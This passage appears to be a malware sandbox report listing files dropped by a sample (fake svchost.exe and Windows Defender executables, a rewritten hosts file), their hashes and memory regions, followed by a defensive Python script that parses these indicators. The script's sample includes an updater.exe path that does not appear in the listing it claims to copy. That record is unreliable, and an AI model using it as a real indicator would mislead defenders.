SHA1 d813e874c2524e3a7da6c466c67854ad16800326
SHA256 e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab
SHA512 e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize 4KB
MD5 f7dcb24540769805e5bb30d193944dce
SHA1 e26c583c562293356794937d9e2e6155d15449ee
SHA256 6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea
SHA512 cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize 192B
MD5 ac7ddd3e9937fbd9a9882f7ed3cb487b
SHA1 b18bcc41af10027195498771667a127f44d824d1
SHA256 485dedcc62e7dc3c8ab4902357998b1d9c398d238c1fbeb42dd8151a490bc530
SHA512 02265bf1bdf9739cf01e17bfdfbcafe11522d092ea7cd56a70652a9b0809ff308385188595215a78ebcbf78606f600d0e45befb0f377945f92207dc8809c273f
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize 340B
MD5 3355ef636d4adfe98b623c9e1e1c7c93
SHA1 9d54b87aff4d9028deb598cc04879ac9378afb10
SHA256 471d43bafed72bc932345e11c5858cce17634aec358dfefc49171fcd365ddb19
SHA512 9912360bf8d68ca47d3c49fec1feb5d800a75dafeb6719bc8900daf396253e1123c0d17a0f8b4dafeb3ac7b0141b6a0195cbf992ab07ac69072f75a834541234
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\Windows\3720402701\2219095117.pri
Filesize 207KB
MD5 e2b88765ee31470114e866d939a8f2c6
SHA1 e0a53b8511186ff308a0507b6304fb16cabd4e1f
SHA256 523e419d2fa2e780239812d36caa37e92f8c3e6a5cd9f18f0d807c593effa45e
SHA512 462e8e6b4e63fc6781b6a9935b332a1dc77bfb88e1de49134f86fd46bd1598d2e842902dd9415a328e325bd7cdee766bd9473f2695acdfa769ffe7ba9ae1953d
-
C:\Users\Admin\AppData\Local\Temp\Windows.exe
Filesize 906KB
MD5 3b76f90844b9260f20a896a052a57757
SHA1 6c2f1bfb9c197bbc3ae77f5baf7a97166090bacc
SHA256 be13288bffa587e4348ed15f2c0f08ecb93c074c927f025a5927316cba6c0bc3
SHA512 a0c01fd24f7b478dfa4641d62d49c4741c4492774548f5297e8cfd9d4e937ca336d305beb4f45e3e38d8a0b9c3a859de2840e406696b45846f9bd528ea23fa42
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
Filesize 6.6MB
MD5 c04937a548c1d6b26c4945653a309669
SHA1 bc9206b9e404ef5ffba8be8077b514992945b17e
SHA256 b0270d630a4ffbb4419dc3fc56296a6851cefa959a1b856d54800cb5502fa12b
SHA512 ff39826db22a5fc5e7f634862cd3eac772b9851695ddeefa123ac0386768d5b5dfd84c7c3ba9bab6b5a5449e0149d0a773dc184b5ea85437297701c95b57e973
-
C:\Users\Admin\AppData\Local\svchost.exe
Filesize 1.2MB
MD5 cb393da95717b30503caafdec3241db8
SHA1 be0686009ce8f92e47986001bfe68289676c0ce9
SHA256 21ee3e3eaed1aec5a32aae34699e343be7c87783808d668f08545e58042ae966
SHA512 35f958111539e8abd9f0b4a45df2f852103c2a112c25fd5ea15c7a76a5eaaee9ec7ca365e704f395625b60526c2f8ee3a135806ad89cedda5449d08645cdf10a
-
C:\Users\Admin\AppData\Roaming\InstallAppUpdates\update.exe
Filesize 1.2MB
MD5 cb393da95717b30503caafdec3241db8
SHA1 be0686009ce8f92e47986001bfe68289676c0ce9
SHA256 21ee3e3eaed1aec5a32aae34699e343be7c87783808d668f08545e58042ae966
SHA512 35f958111539e8abd9f0b4a45df2f852103c2a112c25fd5ea15c7a76a5eaaee9ec7ca365e704f395625b60526c2f8ee3a135806ad89cedda5449d08645cdf10a
-
C:\Users\Admin\Windows Defender.exe
Filesize 4.9MB
MD5 14534cb24128c15a2d6c1dac1b11af55
SHA1 33dc4dac54e1adc5979a3fc732432e6d09a0c8c4
SHA256 4eefc4f042a6570cfbdbaca40622dad3c81b5c63ee039835ec41414569494d62
SHA512 609a0d51a970de923b6de0b128eb452dc9177a70fd78d269287506bbad877194a8c4a66b6a0717bc0486e11ddda6aa94a6152a83d19ae83889e5725a2e7920a7
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize 3KB
MD5 ea6243fdb2bfcca2211884b0a21a0afc
SHA1 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA256 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 065659124d9dd348476a53c4fb958bd6
SHA1 f183b5807a73a8334168849911c2101265172098
SHA256 0d5229666a881640e3dae3d737edb59eea7a475b2256233d237ba42b9f8aa91d
SHA512 b8a018c55303786c1836a97c9fcb9bedefe4e6502b660d05848421d82271944940e511616c746dc157c24c8fa5ba0de0addca37fcd39bf06473b6f185ccf04da
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 ea2cd8c151c956d3fd89080540f3c7d4
SHA1 8162d1a133ac4418a5c90ece08f8ec457064f645
SHA256 ffade3fae8d4b9a3090d33ed83bf7320b829810f8f414f88873b1b8520ea8580
SHA512 95d827e500904b4bef84b7dbab996c3f48ebeca29b4286bbca33825244c9052dee2c016c08bddcfa4fbb3f73f3686132d0e2a6465c26e3b76103e72ee3a151f5
-
C:\Windows\system32\drivers\etc\hosts
Filesize 3KB
MD5 e546b81f1a1a1b753a4f6d3455394dec
SHA1 14f407db119dd97ed248be2a8d15a09ba938987a
SHA256 1100d55448340b1a23c243209beb3aa1035a45912c346c00afb41181d9798de8
SHA512 03f12755ae8c165323b2562b620731217b9f55affe782e6e07540131065b2edf5c465b5440d6b08c7a1a3d8541e423e8c9919ca768f72f830bc211bceb7fccfe
-
memory/356-1250-0x0000000000000000-mapping.dmp
-
memory/548-1496-0x00000242C7780000-0x00000242C77AA000-memory.dmp
Filesize 168KB
-
memory/548-1443-0x00000242C7750000-0x00000242C7773000-memory.dmp
Filesize 140KB
-
memory/632-1498-0x000001E71C2D0000-0x000001E71C2FA000-memory.dmp
Filesize 168KB
-
memory/740-1504-0x0000028D1FBD0000-0x0000028D1FBFA000-memory.dmp
Filesize 168KB
-
memory/896-1507-0x0000026440130000-0x000002644015A000-memory.dmp
Filesize 168KB
-
memory/992-1502-0x000002835E720000-0x000002835E74A000-memory.dmp
Filesize 168KB
-
memory/1588-1340-0x0000000000000000-mapping.dmp
-
memory/2100-1424-0x0000000000000000-mapping.dmp
-
memory/2192-1266-0x0000000000000000-mapping.dmp
-
memory/2212-1431-0x0000000000000000-mapping.dmp
-
memory/2536-1429-0x0000000000000000-mapping.dmp
-
memory/3140-1361-0x0000000000000000-mapping.dmp
-
memory/3336-1272-0x0000000000000000-mapping.dmp
-
memory/3408-1257-0x0000000000000000-mapping.dmp
-
memory/3420-1909-0x0000000000000000-mapping.dmp
-
memory/3596-126-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-131-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-152-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-151-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-154-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-155-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-150-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-156-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-149-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-148-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-147-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-146-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-145-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-144-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-143-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-142-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-159-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-141-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-160-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-140-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-139-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-138-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-137-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-136-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-135-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-134-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-157-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-180-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-161-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-133-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-132-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-179-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-178-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-118-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-177-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-176-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-175-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-174-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-173-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-153-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-129-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-130-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-119-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-128-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-172-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-127-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-171-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-170-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-120-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-158-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-169-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-162-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-125-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-117-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-124-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-168-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-123-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-122-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-121-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-167-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-163-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-166-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-165-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3596-164-0x0000000077840000-0x00000000779CE000-memory.dmp
Filesize 1.6MB
-
memory/3884-1918-0x0000000000000000-mapping.dmp
-
memory/4112-837-0x0000000000460000-0x0000000000480000-memory.dmp
Filesize 128KB
-
memory/4112-758-0x0000000000000000-mapping.dmp
-
memory/4196-639-0x0000000000B10000-0x0000000000B30000-memory.dmp
Filesize 128KB
-
memory/4196-1200-0x00000212A6B10000-0x00000212A6B16000-memory.dmp
Filesize 24KB
-
memory/4196-1197-0x00000212BF5A0000-0x00000212BFA2A000-memory.dmp
Filesize 4.5MB
-
memory/4196-1196-0x00000212A4740000-0x00000212A4BE6000-memory.dmp
Filesize 4.6MB
-
memory/4196-1193-0x00000212A6B00000-0x00000212A6B06000-memory.dmp
Filesize 24KB
-
memory/4196-1189-0x00000212BFA50000-0x00000212BFEF6000-memory.dmp
Filesize 4.6MB
-
memory/4196-1255-0x00000212A6EA0000-0x00000212A6EB2000-memory.dmp
Filesize 72KB
-
memory/4196-573-0x0000000000000000-mapping.dmp
-
memory/4196-1258-0x00000212A6EC0000-0x00000212A6EC6000-memory.dmp
Filesize 24KB
-
memory/4352-1328-0x0000000000000000-mapping.dmp
-
memory/4480-1251-0x0000000000000000-mapping.dmp
-
memory/4600-1253-0x0000000000000000-mapping.dmp
-
memory/4600-1912-0x0000000000000000-mapping.dmp
-
memory/4676-887-0x00000000071E0000-0x0000000007230000-memory.dmp
Filesize 320KB
-
memory/4676-949-0x00000000096C0000-0x0000000009BEC000-memory.dmp
Filesize 5.2MB
-
memory/4676-459-0x0000000000F30000-0x0000000000F74000-memory.dmp
Filesize 272KB
-
memory/4676-306-0x0000000000000000-mapping.dmp
-
memory/4676-883-0x0000000007150000-0x000000000716E000-memory.dmp
Filesize 120KB
-
memory/4676-498-0x0000000001790000-0x0000000001796000-memory.dmp
Filesize 24KB
-
memory/4676-943-0x0000000007400000-0x00000000075C2000-memory.dmp
Filesize 1.8MB
-
memory/4676-1665-0x0000000000000000-mapping.dmp
-
memory/4688-307-0x0000000000000000-mapping.dmp
-
memory/4720-561-0x000000000A290000-0x000000000A2CE000-memory.dmp
Filesize 248KB
-
memory/4720-564-0x000000000A2F0000-0x000000000A33B000-memory.dmp
Filesize 300KB
-
memory/4720-313-0x0000000000000000-mapping.dmp
-
memory/4720-556-0x000000000A360000-0x000000000A46A000-memory.dmp
Filesize 1.0MB
-
memory/4720-553-0x000000000A230000-0x000000000A242000-memory.dmp
Filesize 72KB
-
memory/4720-550-0x000000000A7E0000-0x000000000ADE6000-memory.dmp
Filesize 6.0MB
-
memory/4720-873-0x000000000B7F0000-0x000000000B882000-memory.dmp
Filesize 584KB
-
memory/4720-496-0x0000000000AD0000-0x0000000000AD6000-memory.dmp
Filesize 24KB
-
memory/4720-786-0x000000000A6F0000-0x000000000A756000-memory.dmp
Filesize 408KB
-
memory/4720-461-0x0000000000280000-0x00000000002C4000-memory.dmp
Filesize 272KB
-
memory/4720-871-0x000000000B180000-0x000000000B1F6000-memory.dmp
Filesize 472KB
-
memory/4720-780-0x000000000B2F0000-0x000000000B7EE000-memory.dmp
Filesize 5.0MB
-
memory/4752-1107-0x0000000000000000-mapping.dmp
-
memory/4752-1113-0x0000021C7A490000-0x0000021C7A4B2000-memory.dmp
Filesize 136KB
-
memory/4752-1118-0x0000021C7A640000-0x0000021C7A6B6000-memory.dmp
Filesize 472KB
-
memory/4752-1274-0x0000000000000000-mapping.dmp
-
memory/4768-320-0x0000000000000000-mapping.dmp
-
memory/4768-600-0x0000000003090000-0x00000000030A6000-memory.dmp
Filesize 88KB
-
memory/4768-603-0x0000000000400000-0x0000000000482000-memory.dmp
Filesize 520KB
-
memory/4776-1421-0x0000000000000000-mapping.dmp
-
memory/4832-1275-0x0000000000000000-mapping.dmp
-
memory/4832-1045-0x0000000000250000-0x00000000008E6000-memory.dmp
Filesize 6.6MB
-
memory/4832-1099-0x0000000000DE0000-0x0000000000DE6000-memory.dmp
Filesize 24KB
-
memory/4832-1096-0x000000001BA50000-0x000000001C0C0000-memory.dmp
Filesize 6.4MB
-
memory/4832-1057-0x0000000000DD0000-0x0000000000DD6000-memory.dmp
Filesize 24KB
-
memory/4832-1039-0x0000000000000000-mapping.dmp
-
memory/4868-718-0x0000000000000000-mapping.dmp
-
memory/4868-771-0x0000000000380000-0x00000000003A0000-memory.dmp
Filesize 128KB
-
memory/4868-1674-0x0000000000000000-mapping.dmp
-
memory/4892-1256-0x0000000000000000-mapping.dmp
-
memory/4900-1252-0x0000000000000000-mapping.dmp
-
memory/4908-1439-0x0000000000000000-mapping.dmp
-
memory/4988-1273-0x0000000000000000-mapping.dmp
-
memory/5008-672-0x0000000000030000-0x000000000003F000-memory.dmp
Filesize 60KB
-
memory/5008-676-0x0000000000400000-0x000000000062B000-memory.dmp
Filesize 2.2MB
-
memory/5008-668-0x00000000006D0000-0x000000000081A000-memory.dmp
Filesize 1.3MB
-
memory/5008-477-0x0000000000000000-mapping.dmp
-
memory/5008-721-0x0000000000400000-0x000000000062B000-memory.dmp
Filesize 2.2MB
-
memory/5056-1271-0x0000000000000000-mapping.dmp
-
memory/5068-1393-0x00007FFAC8110000-0x00007FFAC81BE000-memory.dmp
Filesize 696KB
-
memory/5068-1400-0x00007FFAC9D00000-0x00007FFAC9EDB000-memory.dmp
Filesize 1.9MB
-
memory/5068-1374-0x000001EABBAC0000-0x000001EABBB00000-memory.dmp
Filesize 256KB
-
memory/5068-1403-0x00007FFAC8110000-0x00007FFAC81BE000-memory.dmp
Filesize 696KB
-
memory/5068-1390-0x00007FFAC9D00000-0x00007FFAC9EDB000-memory.dmp
Filesize 1.9MB
-
memory/5132-1276-0x0000000000000000-mapping.dmp
-
memory/5184-1269-0x0000000000000000-mapping.dmp
-
memory/5220-1138-0x0000000000400000-0x0000000000736000-memory.dmp
Filesize 3.2MB
-
memory/5220-1922-0x0000000000000000-mapping.dmp
-
memory/5220-1053-0x0000000000400000-0x0000000000736000-memory.dmp
Filesize 3.2MB
-
memory/5220-1042-0x0000000000000000-mapping.dmp
-
memory/5272-1409-0x0000000000000000-mapping.dmp
-
memory/5324-1268-0x0000000000000000-mapping.dmp
-
memory/5348-1208-0x0000000000000000-mapping.dmp
-
memory/5420-1254-0x0000000000000000-mapping.dmp
-
memory/5428-1139-0x0000000000000000-mapping.dmp
-
memory/5440-1385-0x0000000000000000-mapping.dmp
-
memory/5448-1397-0x00007FFAC9D00000-0x00007FFAC9EDB000-memory.dmp
Filesize 1.9MB
-
memory/5448-1384-0x00000001400033F4-mapping.dmp
-
memory/5448-1420-0x00007FFAC8110000-0x00007FFAC81BE000-memory.dmp
Filesize 696KB
-
memory/5448-1419-0x0000000140000000-0x0000000140042000-memory.dmp
Filesize 264KB
-
memory/5572-1260-0x0000000140001844-mapping.dmp
-
memory/5572-1270-0x0000000140000000-0x0000000140056000-memory.dmp
Filesize 344KB
-
memory/5644-1262-0x0000000000000000-mapping.dmp
-
memory/5796-1422-0x0000000000000000-mapping.dmp
-
memory/5796-1144-0x0000000000000000-mapping.dmp
-
memory/5796-1267-0x0000000000000000-mapping.dmp
-
memory/5972-1413-0x0000000007430000-0x000000000747B000-memory.dmp
Filesize 300KB
-
memory/5972-1411-0x0000000007410000-0x000000000742C000-memory.dmp
Filesize 112KB
-
memory/5972-1406-0x0000000007070000-0x00000000073C0000-memory.dmp
Filesize 3.3MB
-
memory/5972-1404-0x0000000006FC0000-0x0000000007026000-memory.dmp
Filesize 408KB
-
memory/5972-1402-0x0000000006670000-0x0000000006692000-memory.dmp
Filesize 136KB
-
memory/5972-1352-0x00000000066F0000-0x0000000006D18000-memory.dmp
Filesize 6.2MB
-
memory/5972-1341-0x0000000005F60000-0x0000000005F96000-memory.dmp
Filesize 216KB
-
memory/6008-1437-0x0000000000000000-mapping.dmp
-
memory/6060-1405-0x0000000000000000-mapping.dmp
-
memory/6068-897-0x0000000000000000-mapping.dmp
-
memory/6084-1161-0x00007FF6063B0000-0x00007FF60672B000-memory.dmp
Filesize 3.5MB
-
memory/6084-1149-0x0000000000000000-mapping.dmp
-
memory/6088-1265-0x0000000000000000-mapping.dmp
-
memory/6108-1940-0x0000000000000000-mapping.dmp
-
memory/6124-1444-0x0000000000000000-mapping.dmp
-
memory/6196-1501-0x0000000000000000-mapping.dmp
-
memory/6284-1506-0x0000000000000000-mapping.dmp
-
memory/6392-1752-0x0000000000000000-mapping.dmp
-
memory/6728-1587-0x00000000004039E0-mapping.dmp
-
memory/7056-1913-0x0000000000000000-mapping.dmp
-
memory/7088-1907-0x0000000000000000-mapping.dmp
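The listing above is the report's dropped-files and memory-region table as extraction flattened it, with each label fused to its value. As an added example, not part of the report or of the sandbox's own tooling, the following Python parses that listing in either the fused form ("updater.exeFilesize" / "MD5abc...") or the spaced form into IOC records, validates hash lengths, checks that every memory region's listed size equals its address range in the report's own KB/MB notation, groups one payload written under several names by SHA-256, and applies a few path heuristics. SAMPLE is copied from entries on this page (trimmed to a handful of records); SYSTEM_NAMES and the checks in triage_paths() are my assumptions, not verdicts the sandbox reports.

```python
"""Added example (not the sandbox's code): parse the flattened dropped-file and
memory listing of a Triage-style report into IOC records and sanity-check them."""
import re
from collections import defaultdict

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s*([0-9a-fA-F]+)\s*$", re.M)
FILE_RE = re.compile(r"^(?P<path>.+?)\s*Filesize\s*(?P<size>\S+)\s*(?P<rest>.*)$", re.S)
MEM_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<idx>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"(?:-0x(?P<end>[0-9A-Fa-f]+))?-(?P<kind>memory|mapping)\.dmp"
    r"(?:\s*Filesize\s*(?P<size>\S+))?")
# Filenames the drops borrow from Windows components (my assumption, not the report's).
SYSTEM_NAMES = {"svchost.exe", "windows defender.exe", "windowsdefender.exe", "updater.exe", "windows.exe"}

def human_size(nbytes):
    """The report's own notation: whole KB below 1 MiB, one-decimal MB above."""
    if nbytes >= 1 << 20:
        return f"{nbytes / (1 << 20):.1f}MB"
    return f"{nbytes / 1024:.0f}KB"

def parse_block(block):
    """One record = the text between two '-' lines; labels may be fused or spaced."""
    text = block.strip()
    m = MEM_RE.match(text)
    if m:
        start = int(m["start"], 16)
        end = int(m["end"], 16) if m["end"] else None
        return {"type": "memory", "pid": int(m["pid"]), "event": int(m["idx"]),
                "kind": m["kind"], "start": start, "end": end, "size": m["size"],
                # the listed size must equal the address range, else it was miscopied
                "size_ok": end is None or human_size(end - start) == m["size"]}
    m = FILE_RE.match(text)
    if not m:
        return None  # e.g. an orphan hash line with no path
    hashes, bad = {}, []
    for label, hexval in HASH_RE.findall(m["rest"]):
        hashes[label] = hexval.lower()
        if len(hexval) != HASH_LEN[label]:
            bad.append(label)  # a dropped or extra hex digit
    return {"type": "file", "path": m["path"].strip(), "size": m["size"],
            "hashes": hashes, "bad_hashes": bad}

def parse_report(text):
    return [r for r in map(parse_block, re.split(r"(?m)^\s*-\s*$", text)) if r]

def group_by_hash(records, algo="SHA256"):
    """Same payload, several names: one hash -> every path it was written to."""
    groups = defaultdict(set)
    for r in records:
        if r["type"] == "file" and algo in r["hashes"]:
            groups[r["hashes"][algo]].add(r["path"])
    return {h: sorted(p) for h, p in groups.items()}

def triage_paths(records):
    """Path heuristics (mine, not verdicts from the sandbox)."""
    findings = set()
    for r in records:
        if r["type"] != "file":
            continue
        path, low = r["path"], r["path"].lower()
        name = low.rsplit("\\", 1)[-1]
        if name.endswith(".exe") and ("\\users\\" in low or "\\programdata\\" in low):
            findings.add((path, "executable dropped in a user-writable location"))
        if name in SYSTEM_NAMES and "\\windows\\system32\\" not in low:
            findings.add((path, "filename imitates a Windows component"))
        if low.endswith("\\drivers\\etc\\hosts"):
            findings.add((path, "hosts file rewritten"))
    return findings

# Constructed from the report's own entries, deliberately mixing the raw fused
# form with the spaced form; SHA512 kept for one record only to keep it short.
SAMPLE = r"""
C:\Program Files\Defender\updater.exeFilesize
4.9MB
MD514534cb24128c15a2d6c1dac1b11af55
SHA133dc4dac54e1adc5979a3fc732432e6d09a0c8c4
SHA2564eefc4f042a6570cfbdbaca40622dad3c81b5c63ee039835ec41414569494d62
SHA512609a0d51a970de923b6de0b128eb452dc9177a70fd78d269287506bbad877194a8c4a66b6a0717bc0486e11ddda6aa94a6152a83d19ae83889e5725a2e7920a7
-
C:\Users\Admin\Windows Defender.exe
Filesize 4.9MB
SHA256 4eefc4f042a6570cfbdbaca40622dad3c81b5c63ee039835ec41414569494d62
-
C:\Users\Admin\AppData\Local\svchost.exeFilesize
1.2MB
SHA25621ee3e3eaed1aec5a32aae34699e343be7c87783808d668f08545e58042ae966
-
C:\Windows\system32\drivers\etc\hosts
Filesize 3KB
SHA256 1100d55448340b1a23c243209beb3aa1035a45912c346c00afb41181d9798de8
-
memory/4768-600-0x0000000003090000-0x00000000030A6000-memory.dmpFilesize
88KB
-
memory/5008-676-0x0000000000400000-0x000000000062B000-memory.dmp
Filesize 2.2MB
-
memory/356-1250-0x0000000000000000-mapping.dmp
"""
```

Feed parse_report() the whole page text to get every record; on this sample the SHA-256 of C:\Program Files\Defender\updater.exe also appears under C:\Users\Admin\Windows Defender.exe, which is exactly the rename group_by_hash() is there to surface, and the 88KB region of PID 4768 and the 2.2MB region of PID 5008 both reconcile with their address ranges. Validating hash lengths before a value goes into a blocklist catches the most common copy error, a hex digit lost at a line wrap.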